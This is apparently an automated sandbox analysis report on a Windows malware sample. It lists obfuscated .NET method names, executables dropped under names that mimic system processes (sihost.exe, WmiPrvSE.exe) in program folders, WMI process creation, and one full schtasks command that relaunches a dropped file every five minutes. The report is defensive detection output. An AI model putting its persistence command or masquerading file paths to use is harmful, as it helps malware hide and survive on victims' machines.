      Source: w9d568i4Ia.exe, LyWNYmrDs8qkabysGCd/LmttwgrhJRsXm6dnTFv.csHigh entropy of concatenated method names: 'RIkeCe3Vm1', 'fFkeVyi3FO', '.ctor', 'k5iWg7UPb9WmVYTqJSi', 'MG3j9gUUOkQS6cxWLfr', 'rtSNtyUZgRe841JKK0L', 'KIVYwTUCaax8KsxIqI9', 'wSr61CUvQ9KMkbBEw5h', 'ttylmUUxAl8qolZHjhZ', 'MJlhc1U9xrs7BLO6XhE'
      Source: w9d568i4Ia.exe, NfVQ9ur6JpaJXPqL39e/R9Pdufr0ATJ4U9tCDhs.csHigh entropy of concatenated method names: '26O', '8r5', '.ctor', 'xO98UDUdLfbHNj7FJX4', 'MILi22UYOZZJQfN0wpo', 'KDPlGsUTIMXIuwMX3qq', 'zRt7d7UbANT0afojCww', 'alnh4qUB5KHtVLqBYkT', 'Od8go0UhGBkg7xH1Osl'
      Source: w9d568i4Ia.exe, YtXpkXegE1YxCgievii/uoeoldeu2wOdVH44TQM.csHigh entropy of concatenated method names: 'p19pxaCSix', 'Sk2', 'jgUpkVFsQM', 'ndNpKgKjXT', 'bsEpcoVn4B', '.ctor', 'Ihd8OV9QIeyjW4Iwqc9', 'Xe1LT09mwd9ulHy3IVZ', 'sja3qI9NIrjCS2YhfyC', 'I3kRRn9OVALYFKZjNZ8'
      Source: w9d568i4Ia.exe, yxKg5JeRppOrt5QRBM4/RHUH4Je5pSl54wymqSu.csHigh entropy of concatenated method names: 'U4V', 'a2T', 'RClpGsNJ5c', 'ne0ptDxe1W', 'GyepfBTZwW', 'kesH8hx3wZMxy4gdOuM', 'T74Kudxifd6mWtJO6qG', 'h7jfmpxDxFgyh7ppmma', 'gbj6TRxHG1V0gHf0Veu', 'e6FUDKxwByYAVT6NUJ7'
      Source: w9d568i4Ia.exe, Nuw98hePX3yXJ69su6s/XGbItuelfYfmWh6FKAs.csHigh entropy of concatenated method names: 'UHypBv3aWo', 'yF1p350HhI', 'KTSukaxy30qmKmjyik6', 'M88AexxaksIDpsu8bY8', 'JWy5rnxJeS7ckXvbVfy', 'iwhWTPxWCYhQv2KoPNA', 'XwT4HoxtOpfwq3uZGrR', 'krl0UPxKg1roYATTVkK', 'txP0hWx8sdQn3YVUNUf', 'Lt17h9x0RTAqiFCP94U'
      Source: w9d568i4Ia.exe, kYxqfIefP7fr1HMLsmu/tLfteVetKImZYWtFiF7.csHigh entropy of concatenated method names: 'M6kNzsM3UH', 'zfZpydTlEl', 'aUPprQOweK', 'ErIpeBH6G8', 'N3GpNGldd3', 'NJ0ppt06Ec', 'dpBpUTOVFA', 'bRPpZRh8qE', 'eitpw60b2U', 'A0JpSDSXmT'
      Source: w9d568i4Ia.exe, oTrsEoeGVn4BNq1Ef7k/hixCgUeMVFsQMJdNgKj.csHigh entropy of concatenated method names: 'dxkNqhXSDC', 'SkVNicF6ur', 'TbYVPXvKivKFVXZMKvN', 'YXFYDGvFwm3ylrZtg7h', 'id2mnyvVgIx6HVATC16', 'k8VyP4voDQSneN6ydD2', 'u4aEm5vkmIwOi5a8T1K', 'nOAvqLvq47uEEJdbklF', 'CScVl6vRQ4R8H48XL3m', 'Dk2CBavInjBXcrmaPmo'
      Source: w9d568i4Ia.exe, V6HQ5GeIk2ghU8Nh5oD/TRq3CEeJUlDm2qg7Rie.csHigh entropy of concatenated method names: 'Fa3NcvHirS', 'ScPNWpReBw', 'N55wxvCHogv3nvbWphu', 'tYehbqC5YsMPpYusByY', 'emAha8CsLfnZXk1VqPL', 'DJUFTFCw4Aup4LyZUh0', 'vwu9LMC3x0fJ3o7YHKp', 'GtuSnnCi99BWwGnEBds', 'Y4snXOCDGG96rnfSWfF', 'p35UuSCzUoYnOVk39pG'
      Source: w9d568i4Ia.exe, MHog7Ce3JvI3cqN8poP/e7TNbQeB7rG7YJNL7OV.csHigh entropy of concatenated method names: 'D5uN3F6uIj', 'xjfNCbGb7C', 'GglNVjhMdq', 'u3eN8iGKhq', 'teENQbDy8M', 'dH6NJb07QN', '.cctor', 'HxFDUIC8wQGF1PTyIWs', 'uXsLJ5C0C0MSS2L4Mex', 'RoKX53CynnkdEDAOG8D'
      Source: w9d568i4Ia.exe, P3ZpD8erZ5ghdjKck05/zusJl4eyxJNUVKF6ojO.csHigh entropy of concatenated method names: 'eaYemXt8Uo', 'tbSedRxVfm', 'XIaenDNnmd', '.ctor', '.cctor', 'QK23WSZpjCH1ZYklsZu', 'WCjiQbZSiIIUxXVsm7Q', 'pStI8HZASOufQ02dkPe', 'xwKlhPZnf51nXZhwBp4', 'CYB0EDZfALheYBj3pxZ'
      Source: w9d568i4Ia.exe, DFon4Or5BBgYgKQfIya/dtI3uNrojcWOnpykUN0.csHigh entropy of concatenated method names: '88F', '461', '.ctor', 'FeYAckYFwqISjH9KIxu', 'S99PmDYVTBXesqZQyvZ', 'imAl3oYoU9rJE7APXOk', 'r2Y2odYkWKSQVJWQTKs', 'DIP3rEYq0hHdJAcvXQ3', 'UlprKBYRuceleNJtD3k', 'RNo0KVYIHUlFHOpMeuU'
      Source: w9d568i4Ia.exe, pqB2dRZk5I1pxrqFJNT/hOY03rZxQ7OwwA5hIBB.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'AhXg5Mjfyp', 'W4y', '854', 'lF2', 'omvgRjc3OV', 'e61', 'c7jg4akKnL', 'xnwgmrQs21'
      Source: w9d568i4Ia.exe, Dgv59lNCL04nYCbV6Ee/NAmQQkN3LKWgb25F6Pr.csHigh entropy of concatenated method names: 'BT1SIhFP5J', 'oMuSX0UZj3', 'WJWSMKN44c', 'ckcSGNcNqp', 'M77St6DcgM', 'rWxSfdd36R', 'tGFSlJ3VHY', 'CacSPviwGT', 'sd7Soyr42N', 'oWvS5bP0GI'
      Source: w9d568i4Ia.exe, EU3nN7NUxlAgl22X4Lx/dkbO6YNpY0C1HhMx3rB.csHigh entropy of concatenated method names: '1zj', '81d', '.ctor', 'v0bwLAw6ej', 'kb6wTmE8jf', 'l3nwsXG5Rv', 'uS5wacJ9Zc', 'pMYFxo0PZpdWQT90dUY', 'IRHcvg0Cwv1NXUuvGbV', 'ASrZ2l0U4CWfHDd7qNu'
      Source: w9d568i4Ia.exe, Dlo2XkezYmQlajMKZfY/HaMssJei8RO1k4HC70I.csHigh entropy of concatenated method names: 'nB7wt10iGk', 'SlGwf59VqJ', 'tYuwlnukBi', 'gCowPeeMm7', 'CE3woWbfmu', 'rgmw5Ie2fO', 'KOGwRDu0dj', 'SPPw45uZoI', 'FrbVXb8LSU4jIpHB01v', 'nt78ST8p3U40Ekm9Qx2'
      Source: w9d568i4Ia.exe, UAvVGlevgHvanwFJ4mg/fcKa2xe2T5Ze1RBbupp.csHigh entropy of concatenated method names: 'EvVU1GlgHv', 'InwU0FJ4mg', 'VdkU6lEfHL', 'Y3nUhmnbT1', 'sCtUDsn4e5', 'pZxUFhwXZA', 'D4HUxS8k5M', 'DV1UkqAnM3', 'RymUKvNp6s', 'WwVUc3Aa5j'
      Source: w9d568i4Ia.exe, WSblIKebZWGmJBS5E8T/J3vIfBea1oVLQNIYrWN.csHigh entropy of concatenated method names: '#Nn', 'K1xULxbBwK', 'rIjUTGb3vI', 'sB1UsoVLQN', 'nYrUaWN7Sb', 'sIKUbZWGmJ', '.ctor', 'WB6wN8ev6EjvSNhHfAo', 'eUotaKexGlbvw8IB0j4', 'hjSyZSePQTDlWKqhwRj'
      Source: w9d568i4Ia.exe, ilNuXZSMb67aumFYIx/GkPMyQwHTJbO04733q.csHigh entropy of concatenated method names: '.ctor', 'l34eRVJaH', 'QUZN0gRkl', 'i8spAxrm5', 'ufMUhZ6fD', 'N13ZFCIt0', 'yqrwCAlxj', 'Wc6SiRsoR', 'QtD4ePvN09JwnanXNf', 'IlS1sSx6Y5O1OFKG31'
      Source: w9d568i4Ia.exe, a1s4bXZaeLWdAlgee7L/CoBRGhZsnF7ddO17E5E.csHigh entropy of concatenated method names: '.ctor', '8e5', 'AgC9kB1Gec', 'E75', '2e1', '127', 'gsN', '992', '377', 'Dyt'
      Source: w9d568i4Ia.exe, SwfwMXZLvaJLWkC21kA/gNmJrMZO3sWXw6Y1FdP.csHigh entropy of concatenated method names: '.ctor', 'XP9nLNKs4A', '71i', '951', 'uamnT0BNba', 'gN6nsoUwP9', 'gGvnai9roM', 'OVanb7LKF8', 'bJmn28CSXF', 'CEBnvrjaBb'
      Source: w9d568i4Ia.exe, E4gYHhZA9PTnGEfM5fk/uGOMeZZEKZrwnW3vaBV.csHigh entropy of concatenated method names: '.ctor', '5U3', '52K', '6a8', 'NiVnmFmT5g', 'v0ZndOciCB', 'Gl7nn4baK8', 'XiFn9ojJ8F', 'e4LnuM00F9', 'kjnngOmtId'
      Source: w9d568i4Ia.exe, w1GuumZg1Hx8TMFUAJa/ADcr8fZu6cmjS0C0Hvi.csHigh entropy of concatenated method names: '.ctor', 'Ay9nBuMmwC', 'ys5n3Dse9w', 'RI4nCMQBNt', 'U1s', 'yYS', '79P', '5lh', 'j46', 'J63'
      Source: w9d568i4Ia.exe, JolknPZ9bZd5TxMYbQt/p5AWggZngWwh9OKRIta.csHigh entropy of concatenated method names: '.ctor', '518', 'E6y', '17E', '79s', 'XCq', 'vm2', '5yr', 'dlO', 'Q7M'
      Source: w9d568i4Ia.exe, rEIE2JZdJVFgVk6S3N8/w597wuZmLv1chrLlXcF.csHigh entropy of concatenated method names: '9Xh', 'pA2', '5v5', '4m5', '1I6', 'ynJ', '15m', 'V8n', '753', 'c15'
      Source: w9d568i4Ia.exe, Xps0xkZ4q0W5qLGEK6O/uit85TZRkLpEP9heir6.csHigh entropy of concatenated method names: '6u4', 'mQ9', 'IuPd432IRM', '639', '132', '775', 'OOV', 'F1i', 'M4T', '7dM'
      Source: w9d568i4Ia.exe, NkFXP9Z52x5sKFBoTd7/wDF4gGZoaDDorgB7uJq.csHigh entropy of concatenated method names: 'ITxdlM4QE2', 'vwSdPjawbj', 'L0udomYYBy', 'hM1d5nL6nF', 'T57dRIgOaA', 'nLRTlK2u7nC0AQnIIlx', 'egvCf72XC4D3BodyH5x', 'xlAoOi2MUfBCQgvxn5u', 'XE6y3n2BiRwvuSxdBln', 'pwksPe2h9QXls2kwG8K'
      Source: w9d568i4Ia.exe, SIEK9CUOyJ9mWSqtx3d/td3DexUAeoKahVg17fh.csHigh entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'ejZ4KWhGS5', 'iUe4ckuCNp', 'XMS4WsnWbh', 'yxL4jS7bO8', 'DCm47OwLBF', 'ldZ4qiAilB', 'KcAtU9nH9WhAIMhf75L'
      Source: w9d568i4Ia.exe, BLw7NoUELmZ311ngIL4/bHEBrSUYX5d3p00eY7A.csHigh entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'opd4Dx92xq', 'lnX4FHPUZE', 'RXY4xcg8Ey', 'WJ4VSenOoO0MlFsdqaV', 'QpZfx0nlxClxNAP5eja', 'U1CnhrnGVuTKBPk9I8E', 'EXNTrDngTQWf2YNYcxK'
      Source: w9d568i4Ia.exe, IIBn3bU9OLbflhVEYWE/OuD2reUnhx21RiANcYW.csHigh entropy of concatenated method names: '.ctor', '.ctor', 'mQt4bBlDjN', 'lDR42ixyup', 'a3n4v07tan', 'r2e4HCrYyC', 'MHB41lQDQE', 'lgdShNnp0DBvOQPKGHb', 'PMUCuBnERnMlkpaupmF', 'g0pNrwnL5MubqZEomRK'

      Persistence and Installation Behavior

      barindex
      Drops executable to a common third party application directory
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeJump to behavior
      Creates processes via WMI
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\windows nt\RCXAE26.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA6F0.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\windows nt\RCXABD4.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Users\user\Desktop\RCX974A.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA3A3.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Users\user\Desktop\w9d568i4Ia.exe (copy)Jump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe (copy)Jump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe (copy)Jump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Users\user\Pictures\Camera Roll\RCX9E80.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Users\user\Desktop\RCX999C.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Users\user\Pictures\Camera Roll\RCX9CF9.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA23A.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile created: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA887.tmpJump to dropped file

      Boot Survival

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedules
      Source: unknownProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vLhkFRJoasJvKPEeUEtnv" /sc MINUTE /mo 5 /tr "'C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe'" /f
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
